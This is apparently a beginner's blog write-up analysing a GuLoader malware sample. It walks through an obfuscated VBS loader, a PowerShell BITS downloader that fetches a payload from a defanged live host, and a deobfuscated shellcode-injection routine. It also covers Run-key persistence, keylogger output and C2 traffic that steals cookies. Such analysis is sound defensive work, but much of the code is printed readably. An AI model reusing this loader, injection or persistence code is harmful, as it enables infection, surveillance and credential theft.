GuLoader Analysis

December 15, 2023

This week I was browsing MalwareBazaar for interesting samples and came across a GuLoader VBS upload. I’m still pretty new to malware analysis and I haven’t done anything with VBS files, so I thought I’d take the chance to go through the malware and see what it was doing.

Note: This ended up being a very long post, even with truncated code samples…

GuLoader (or the sample I used) has three stages.

The downloaded VBS script is run to build and execute a PowerShell script.
The PowerShell script is used to download, decode, and execute a Base64-encoded file.
The decoded file is used to BXOR and execute a series of encoded PowerShell commands for process hollowing and shellcode injection.

The original VBS file was heavily obfuscated with extraneous comments. However, there was very little code obfuscation which made it simple, if not tedious, to clean it up. The original script was full of Danish words, and functions/variables were also in Danish.

Original VBS sample (Comments removed)

Set Dedasin = GetObject("winmgmts:{impersonationLevel=" & "i" & "mpersonate}!\\.\root\cimv2")
on error resume next
Set Ungrin = Dedasin.ExecQuery("Select * from Win32_Service")
Batteriforeningenspr = Batteriforeningenspr - 1074902 
For Each Unexcep in Ungrin
	Racemi = Racemi + Unexcep.DisplayName  
Next
philosophunculeforhe = RTrim("Efterkommelsens")
Const Couscousou68 = &HA66A
Const Domspraksissernes = "Biskuit Afstikkes Overlearnedly"
Const Forsamlingsfrihedernes = &H80DD
Const Sprllets217 = "Svrmeriets Solfeggi"
Const amarity = &HFFFFB16A
Const Hiodont = "Bashfulness Marty"
Const Externalism = -34380
Const arcosolia = 46644
Const Beclog116 = "Institutionel Pjats121 Formynders"
Const Euforiseret = "Analysesystemet Hypocenter Suttekludens"
Const Tabourer = "omdefinerende Uranophobia Opisthodont62"
Const Conchate = 23586
Const Scutes = &HFFFFD86B
Const Europerens = "Differentiations Faldes eleotrid"
Const Lydsenderens = &HFFFF1863
Const Indane = &H81BB
Const Faktureringerne = &H1CE1
Const Overcompliant = "Prferencetolds Unregretful Underdirektorie"
Const Objekters = "sapient Blodskamsforholdets226 fjortenaars Afkrvningens"
Const Teleteknikere = &H7340
Queas = instr(1,Racemi,"Microsoft",vbTextCompare)
...

It’s a pretty basic loader that builds a PowerShell script and executes it. It does use some tricks when building the code to obfuscate it, but it doesn’t do anything too crazy.

Cleaned and renamed VBS code

Set WinMgmtsCimv2 = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set SelectAll = WinMgmtsCimv2.ExecQuery("Select * from Win32_Service")
For Each Unexcep in SelectAll
	DisplayNameArray = DisplayNameArray + Unexcep.DisplayName  
Next
CompareDisplayNameToMicrosoft = instr(1,DisplayNameArray,"Microsoft",vbTextCompare)
if CompareDisplayNameToMicrosoft <> 0 then 
	CompareDisplayNameToMicrosoft = mid(DisplayNameArray,CompareDisplayNameToMicrosoft+5,1)
	CompareDisplayNameToMicrosoft=UCase(CompareDisplayNameToMicrosoft)
	PowerShellExe = "ower" + CompareDisplayNameToMicrosoft + "hell.exe " 
end if
Set ShellApplication = CreateObject("Shell.Application")
S0 = S0 + "<PowerShell code here"
S0 = Replace(S0,"Calc32",CompareDisplayNameToMicrosoft)
S0 = Replace(S0,"txt",".")
ShellApplication.ShellExecute "P" & PowerShellExe, ChrW(34) + S0 + ChrW(34), "", "", 0

The script it builds gets processed into another loader that uses BITS to download a file from http[:]//ytgz5[.]sa[.]com/Metholcate.inf (103[.]83[.]194[.]50). This is a Base64-encoded file containing a payload and another script for process hollowing and loading the shellcode into memory.

BITS file downloader sample

Function Sopraner ([String]$Anchora){$Hitc = 5
For($Louted=4
 $Louted -lt $Anchora.Length-1
 $Louted+=$Hitc){	$Samordnin444 = $Anchora.Substring($Louted, $Overellipt46)
	$Samordnin44=$Samordnin44+$Samordnin444
	}
$Samordnin44
}
$Overellipt46 = (cmd /c 'echo 1 && exit')
$Samordnin4401=Sopraner 'Matii GaaeGourxPsyl '
$Samordnin4402=Sopraner 'TerrT StarOpbraKrydnStans KnsfHindeDngerIsogrUdreismagnglutg Tra '
$Prve = Sopraner 'Vign\ NonsDemoyCoagsStrrw SnuoGrftwByer6Unsh4Scan\KravWWaggiFixun StadScoroButiwVidesmisaP HemoForbw EmbeElvarUnsaS SphhGelaeTakklTrollPopp\ UnbvGenf1 Ane.Perj0 Inf\RecipTjuroStevwPolyeQuadr DepsbolshBaggeTeksl OldlCros.jomoeSelexBordeMind '
function antein ($Filmgenre){&           ($Samordnin4401) ($Filmgenre)
}
$Sammens=Sopraner 'RegnhopsttHardtSrilpOver: Bef/Bess/ SkiyMeastPantgtimiz Bab5 Dil.NonfsStilaKaur.IndacLeveoKonsmCloy/drupM Udle FrstOpsph Dopo virlGatecSummaSpectAutoeFatt.FermiMelon DemfTilr '
antein (Sopraner 'Bund$NonfgCoprlSaloo EmbbBogsaAlsblJoin:BegyWBomboOiliuSitdsLtbt2Alex=Appl$There MycnPrinvEqui:TachwobjeiRettnPeridTieriNoncrSptt ') 
...

When executed, each string is sent to be processed and executed through invoke-expression.

Cleaned and renamed BITS downloader sample

Function ProcessString ([String]$String){
	$Five = 5
	For($i=4;$i -lt $String.Length-1;$i+=$Five){	
		$SubString = $String.Substring($i, $Skip)
		$CompiledString=$CompiledString+$SubString
	}
$CompiledString
}
$Skip = (cmd /c 'echo 1 && exit')
$CompiledString01=ProcessString 'Matii GaaeGourxPsyl '
$CompiledString02=ProcessString 'TerrT StarOpbraKrydnStans KnsfHindeDngerIsogrUdreismagnglutg Tra '
$Prve = ProcessString 'Vign\ NonsDemoyCoagsStrrw SnuoGrftwByer6Unsh4Scan\KravWWaggiFixun StadScoroButiwVidesmisaP HemoForbw EmbeElvarUnsaS SphhGelaeTakklTrollPopp\ UnbvGenf1 Ane.Perj0 Inf\RecipTjuroStevwPolyeQuadr DepsbolshBaggeTeksl OldlCros.jomoeSelexBordeMind '
function Execute ($DecodedString){&($CompiledString01) ($DecodedString)}
$MalURL=ProcessString 'RegnhopsttHardtSrilpOver: Bef/Bess/ SkiyMeastPantgtimiz Bab5 Dil.NonfsStilaKaur.IndacLeveoKonsmCloy/drupM Udle FrstOpsph Dopo virlGatecSummaSpectAutoeFatt.FermiMelon DemfTilr '
Execute (ProcessString 'Bund$NonfgCoprlSaloo EmbbBogsaAlsblJoin:BegyWBomboOiliuSitdsLtbt2Alex=Appl$There MycnPrinvEqui:TachwobjeiRettnPeridTieriNoncrSptt ') 
...

Decoded, the script uses BITS to download the malicious file Metholcate.inf as Dehydr151.Hyp into the user’s AppData folder. It then loads and decodes the content and creates a new variable based on a substring of the decoded data.

Decoded script

$CompiledString02 = Transferring
$Prve = \syswow64\WindowsPowerShell\v1.0\powershell.exe
$MalURL = http[:]//ytgz5[.]sa[.]com/Metholcate.inf
$MalDownload = $global:Wous8 = Start-BitsTransfer -Source $MalURL -Destination $Wous2

$global:Wous2=$env:windir
$global:Wous6=$Wous2+$Prve
$global:Wous3 = ((gwmi win32_process -F ProcessId=${PI3D}).CommandLine) -split [char]34
$global:Wous4 = $Wous3[$Wous3.count-2]
$global:Wous5=(Test-Path $Wous6) -And ([IntPtr]::size -eq 38)
if ($Wous5) {&$Wous6 $Wous4}
 else {
    $global:Wous2=$env:appdata
    Import-Module BitsTransfer
    $Wous2=$Wous2+'\Dehydr151.Hyp' 
    $global:Wous7=(Test-Path $Wous2)
    while (-not $wous7){
        If ($Wous8.JobState -eq $CompiledString02) {Start-Sleep 1}else{Start-Sleep 1;ProcessString $MalDownload}
        $global:Wous7=(Test-Path $Wous2)
    }
    $global:Archimo = Get-Content $Wous2
    $global:Assa = [System.Convert]::FromBase64String($Archimo)
    $global:Samordnin442 = [System.Text.Encoding]::ASCII.GetString($Assa)
    $global:Samordnin443=$Samordnin442.substring(273071,19010)
    $CompiledString3
}

The substring is a heavily obfuscated PowerShell script. It follows the same pattern as the first VBS script. Every other line is commented nonsense and the code is obfuscated, this time through a BXOR function.

Cleaned and renamed BXOR sample

function BXORFunction ($Viderese,$Fidgetbrad) {
    # $Viderese -bxor $Fidgetbrad
    Execute (ProcessString 'bygg$PyraV...')
}
Function DecodeAndExecute ([String]$String, $BoolA = 0){
    # $global:ByteObject = New-Object byte[] ($String.Length / 2)
    Execute (ProcessString 'Prop$UnisgNormlFusto...')
    For($i=0; $i -lt $String.Length; $i+=2){
        # $ByteObject[$i/2] = [convert]::ToByte($String.Substring($i, 2), 16)
        Execute (ProcessString 'Koef$StamOHartbUninjGraneF...)'
        $ByteObject[$i/2] = BXORFunction $ByteObject[$i/2] 185
    }
    # $global:ByteEncodedCommand=[String][System.Text.Encoding]::ASCII.GetString($ByteObject)
    Execute (ProcessString 'Rati$ geogDisclRunoogaldbNonfaOverl...')
    if ($BoolA) { 
        Execute $ByteEncodedCommand
    }else {
        $ByteEncodedCommand
    }
}
$Symptomica740=DecodeAndExecute 'EAC0CACDDCD497DDD5D5'
$Symptomica741=DecodeAndExecute 'F4D0DACBD6CAD6DFCD97EED0D78A...'
$Symptomica742=DecodeAndExecute 'FEDCCDE9CBD6DAF8DDDDCBDCCACA'
...
function ByteEncodedCommand01 ($Topa, $Raadeli37) {
DecodeAndExecute '9DDED5D6DB...' 1
DecodeAndExecute '9DDED5D6DB...' 1
DecodeAndExecute 'CBDCCDCCCB...' 1
}
function ByteEncodedCommand00 ([Parameter(Position = 0)] [Type[]] $Jaro,[Parameter(Position = 1)] [Type] $Proschoo = [Void]) {
DecodeAndExecute '9DDED5D6DB...' 1
DecodeAndExecute '9DDFD5D5DC...' 1
...

The first half of the script uses the BXORFunction to decode a series of variables and assemblies. The second half uses the same function but flags the $BoolA parameter, marking it as executable code. The code itself loads the payload into the console process memory through process hollowing techniques. This is a little outside of my wheelhouse, but I commented on functions as best I could with the power of Google.

Decoded BXOR code sample

$SystemDLL = System.dll
$Win32UnsafeMethods = Microsoft.Win32.UnsafeNativeMethods
$ProcessAddress = GetProcAddress
$RuntimeInterop = System.Runtime.InteropServices.HandleRef
$StringMethod = string
$ModuleHandle = GetModuleHandle
$RTSpecialName = RTSpecialName, HideBySig, Public
$ManagedRuntime = Runtime, Managed
$RefDelegate = ReflectedDelegate
$MemoryModule = InMemoryModule
$DelegateType = MyDelegateType
$Class = Class, Public, Sealed, AnsiClass, AutoClass
$Invoke = Invoke
$Public = Public, HideBySig, NewSlot, Virtual
$VirtAlloc = VirtualAlloc
$NTDLL = ntdll
$VirtualMemory = NtProtectVirtualMemory
$Slash = \
$User32 = USER32
$CallWindow = CallWindowProcA
$Kernel32 = kernel32
$User32 = user32
$ByteObject00 = ShowWindow

# Executing code
# This function is from PowerSploit and 
function ByteEncodedCommand01 ($Topa, $Raadeli37) {
    # Gets Microsoft.Win32.UnsafeNativeMethods from System.dll
    $global:ByteEncodedCommand08 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split($Slash)[-1].Equals($SystemDLL) }).GetType($Win32UnsafeMethods)
    # Gets process addresses
    $global:ByteEncodedCommand10 = $ByteEncodedCommand08.GetMethod($ProcessAddress, [Type[]] @($RuntimeInterop, $StringMethod))
    # Invokes some passed parameters in process memory (shellcode?)
    return $ByteEncodedCommand10.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($ByteEncodedCommand08.GetMethod($ModuleHandle)).Invoke($null, @($Topa)))), $Raadeli37))
}

# PowerShell Reflection https://gist.github.com/JohnHammond/f1900c6292f6a51dbfc3e4b6d53c60d8
# https://gist.github.com/macostag/f62b688ace243cc7ed426c133ba3efae
# Metasploit payload
function ByteEncodedCommand00 ([Parameter(Position = 0)] [Type[]] $Jaro,[Parameter(Position = 1)] [Type] $Proschoo = [Void]) {
$global:ByteEncodedCommand15 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($RefDelegate)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($MemoryModule, $false).DefineType($DelegateType, $Class, [System.MulticastDelegate])
$ByteEncodedCommand15.DefineConstructor($RTSpecialName, [System.Reflection.CallingConventions]::Standard, $Jaro).SetImplementationFlags($ManagedRuntime)
$ByteEncodedCommand15.DefineMethod($Invoke, $Public, $Proschoo, $Jaro).SetImplementationFlags($ManagedRuntime)
return $ByteEncodedCommand15.CreateType()
}

# Allocate memory space
# Matches Cobalt Strike beacon patterns https://medium.com/@cybenfolland/deobfuscating-a-powershell-cobalt-strike-beacon-loader-c650df862c34
$global:ByteEncodedCommand16 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ByteEncodedCommand01 $Kernel32 $VirtAlloc), (ByteEncodedCommand00 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$global:ByteEncodedCommand17 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ByteEncodedCommand01 $User32 $ByteObject00), (ByteEncodedCommand00 @([IntPtr], [UInt32]) ([IntPtr])))

# Gets title of console
$Title = 'Toppi'
${Host}.UI.RawUI.WindowTitle = $Title
# Finds the process of the console
$global:Whea = (Get-Process | Where-Object { $_.MainWindowTitle -eq $Title })
$global:Johnin = $Whea.MainWindowHandle
# Uses the handle to access memory space of console
$ByteEncodedCommand17.Invoke($Johnin, 0)
$Nurture = ByteEncodedCommand01 $NTDLL $VirtualMemory

# Creates pointers to memory space / buffer
$global:ByteEncodedCommand3 = $ByteEncodedCommand16.Invoke([IntPtr]::Zero, 642, 0x3000, 0x40)
$global:ByteEncodedCommand20 = $ByteEncodedCommand16.Invoke([IntPtr]::Zero, 19771392, 0x3000, 0x4)

# Copy data to unmanaged memory pointer
[System.Runtime.InteropServices.Marshal]::Copy($Assa, 0,  $ByteEncodedCommand3, 642)
$Rabiattilh=273071-642
[System.Runtime.InteropServices.Marshal]::Copy($Assa, 642, $ByteEncodedCommand20, $Rabiattilh)

# Execute copied data
$global:ByteEncodedCommand21 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ByteEncodedCommand01 $User32 $CallWindow), (ByteEncodedCommand00 @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([IntPtr])))
$ByteEncodedCommand21.Invoke($ByteEncodedCommand3,$ByteEncodedCommand20,$Nurture,0,0)

As mentioned, the Base64 file that was downloaded contains both the BXOR script and the shellcode. The shellcode runs to create registry entries and autoruns that contain the BITS file downloader function. These are in HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stemnin and HKCU\Amit\Torp.

The run key contains code that executes the function in HKCU\Amit

HKCU\SOFTWARE\Microsoft\CurrentVersion\Run\Stemnin

%Wirlasa% -w 1 $Bissekrmme=(Get-ItemProperty -Path 'HKCU:\Amit\').Torp;%Wirlasa% ($Bissekrmme)

Additionally, WAB.exe is configured to send communications to a C2 Server (85[.]209[.]176[.]69).

User activities are logged to a file “vorspt.dat” and sent to the C2 via WAB.exe

Contents of vorspt.dat

[2023/12/14 04:13:04 Offline Keylogger Started]
[2023/12/14 04:13:05 Capturing from Ethernet0]
[Text copied to clipboard]
5296
[End of clipboard]
[Text copied to clipboard]
85.209.176.69
[End of clipboard]
[2023/12/14 04:13:56 Process Monitor - Sysinternals: www.sysinternals.com]
[2023/12/14 04:14:13 Capturing from Ethernet0]
[2023/12/14 04:14:20 Process Monitor - Sysinternals: www.sysinternals.com]
[2023/12/14 04:14:21 Process Explorer - Sysinternals: www.sysinternals.com [DESKTOP-KK5U5KN\Bajiri] (Administrator)]
[2023/12/14 04:14:45 wab.exe:7152 Properties]
[2023/12/14 04:15:31 Process Explorer - Sysinternals: www.sysinternals.com [DESKTOP-KK5U5KN\Bajiri] (Administrator)]
[2023/12/14 04:15:41 taskhostw.exe:7912 Properties]
[2023/12/14 04:15:48 Process Explorer - Sysinternals: www.sysinternals.com [DESKTOP-KK5U5KN\Bajiri] (Administrator)]
[2023/12/14 04:16:24 Process Monitor - Sysinternals: www.sysinternals.com]
[2023/12/14 04:16:32 Search]
expl[Enter]
[2023/12/14 04:16:36 File Explorer]
[2023/12/14 04:16:36 This PC]
[2023/12/14 04:16:41 C:\]
[2023/12/14 04:16:43 C:\Users]
[2023/12/14 04:16:44 C:\Users\Bajiri]
[2023/12/14 04:16:46 C:\Users\Bajiri\AppData]
[2023/12/14 04:16:47 C:\Users\Bajiri\AppData\Roaming]
{ User has been idle for 1 minutes }
[2023/12/14 04:19:52 Process Monitor - Sysinternals: www.sysinternals.com]
[2023/12/14 04:19:58 Process Monitor - Sysinternals: www.sysinternals.com (Not Responding)]
[2023/12/14 04:20:20 C:\Users\Bajiri\AppData\Roaming]
[2023/12/14 04:20:22 Process Monitor - Sysinternals: www.sysinternals.com (Not Responding)]
[2023/12/14 04:20:23 Process Explorer - Sysinternals: www.sysinternals.com [DESKTOP-KK5U5KN\Bajiri] (Administrator)]
[2023/12/14 04:20:26 Wireshark]
[2023/12/14 04:20:29 *Ethernet0]
[2023/12/14 04:20:31 Wireshark · Save Capture File As]
...

The final step of the shellcode execution is to initiate communications with the C2 server. This includes information on the system and user, location data pulled from www[.]geoplugin[.]com (178[.]237[.]33[.]50), and the contents of vorspt.dat.

WireShark TCP Stream (cleaned)

$fKNCHALA||DESKTOP-KK5U5KN/Bajiri||US||Windows 10 Enterprise (64 bit)||||8588910592||493 Pro||C:\Users\Bajiri\AppData\Roaming\vorspt.dat||C:\Program Files (x86)\windows mail\wab.exe||||Capturing from Ethernet0||1||3531||752859||0||8520917669||lipegtst-R93761||0||C:\Program Files (x86)\windows mail\wab.exe||AMD Ryzen 9 5900X 12-Core Processor            ||Exe||||Pze$NL0||Capturing from Ethernet0||3843||753171${
  "geoplugin_request":"1728347133",
  "geoplugin_status":200,
  "geoplugin_delay":"2ms",
  "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>",
  "geoplugin_city":"Toronto",
  "geoplugin_region":"Ontario",
  "geoplugin_regionCode":"ON",
  "geoplugin_regionName":"Ontario",
  "geoplugin_areaCode":"",
  "geoplugin_dmaCode":"",
  "geoplugin_countryCode":"CA",
  "geoplugin_countryName":"Canada",
  "geoplugin_inEU":0,
  "geoplugin_euVATrate":false,
  "geoplugin_continentCode":"NA",
  "geoplugin_continentName":"North America",
  "geoplugin_latitude":"436227",
  "geoplugin_longitude":"-793892",
  "geoplugin_locationAccuracyRadius":"20",
  "geoplugin_timezone":"America\/Toronto",
  "geoplugin_currencyCode":"CAD",
  "geoplugin_currencySymbol":"$",
  "geoplugin_currencySymbol_UTF8":"$",
  "geoplugin_currencyConverter":13475
}$NL0||Capturing from Ethernet0||8765||758093$OL0||Capturing from Ethernet0||12000||788312$L0||Process Monitor - Sysinternals: www.sysinternals.com||0||818484$L0||Process Explorer - Sysinternals: www.sysinternals.com [DESKTOP-KK5U5KN\Bajiri] (Administrator)||11266||848687$IL0||wab.exe:7152 Properties||0||878890$UL0||taskhostw.exe:7912 Properties||0||909062$L0||Process Explorer - Sysinternals: www.sysinternals.com [DESKTOP-KK5U5KN\Bajiri] (Administrator)||0||939234$!L0||C:\||0||969453$\L0||C:\Users\Bajiri\AppData\Roaming||2391||999609$^L0||C:\Users\Bajiri\AppData\Roaming||32563||1029781$^L0||C:\Users\Bajiri\AppData\Roaming||16500||1059953$^L0||C:\Users\Bajiri\AppData\Roaming||46718||1090171$^L0||C:\Users\Bajiri\AppData\Roaming||76890||1120343

After receiving this data, the C2 server sends a padded payload to the victim. Parsing this data reveals it to be NirSoft’s Web Browser Pass View.

This payload is executed by the victim and the SQLite data is forwarded to the C2 server.

SQLite output sent to C2 (cleaned)

$140161392||1||||SQLite format 3@  9E9j
g
$5Gindexcookies_unique_indexcookiesCREATE UNIQUE INDEX cookies_unique_index ON cookies(host_key, top_frame_site_key, name, path)@WtablecookiescookiesCREATE TABLE cookies(creation_utc INTEGER NOT NULL,host_key TEXT NOT NULL,top_frame_site_key TEXT NOT NULL,name TEXT NOT NULL,value TEXT NOT NULL,encrypted_value BLOB NOT NULL,path TEXT NOT NULL,expires_utc INTEGER NOT NULL,is_secure INTEGER NOT NULL,is_httponly INTEGER NOT NULL,last_access_utc INTEGER NOT NULL,has_expires INTEGER NOT NULL,is_persistent INTEGER NOT NULL,priority INTEGER NOT NULL,samesite INTEGER NOT NULL,source_scheme INTEGER NOT NULL,source_port INTEGER NOT NULL,is_same_party INTEGER NOT NULL,last_update_utc INTEGER NOT NULL)f/tablemetametaCREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)';indexsqlite_autoindex_meta_1meta
;last_compatible_version19version19#mmap_status-1
;last_compatible_versionversion#	mmap_status8E2znh\VPJD>t8&,b Du9^B1A@
>{=g;J-6:5$l7S6%2u#b4	y,0~E*X!v(I'+&l%u"M8o7 p(C&v1	+YL<5_g
7/E
?+3CJ{Cr?O('
...

This is where I would go into the procmon capture I made and fill out some gaps and examine some processes, but it crashed my VM lol. Instead, I’ll wrap it up and put some links below to VirusTotal and AnyRun reports.

VirusTotal links for related addresses:

Payload server [Active!]
https://www.virustotal.com/gui/ip-address/103.83.194.50

C2 Server [Active!]
https://www.virustotal.com/gui/ip-address/85.209.176.69

GeoPlugin (Community marks it as a RAT)
https://www.virustotal.com/gui/ip-address/178.237.33.50

AnyRun report on the sample: https://any.run/report/2ceab92f90ff80d411d1749601290d25e0f22ee2ee47fe7d3933c6377ab9edd5/4bf92da3-43ee-453b-8213-c6a34794d72c

GuLoader is a tricky multi-stage malware. It uses some more advanced techniques to avoid detection and some versions include methods to detect sandboxing and VMs. It’s one of the more interesting pieces of malware I’ve seen so far, and I was able to pick up some new techniques I hadn’t seen before. A cool little distraction to an otherwise boring week lol.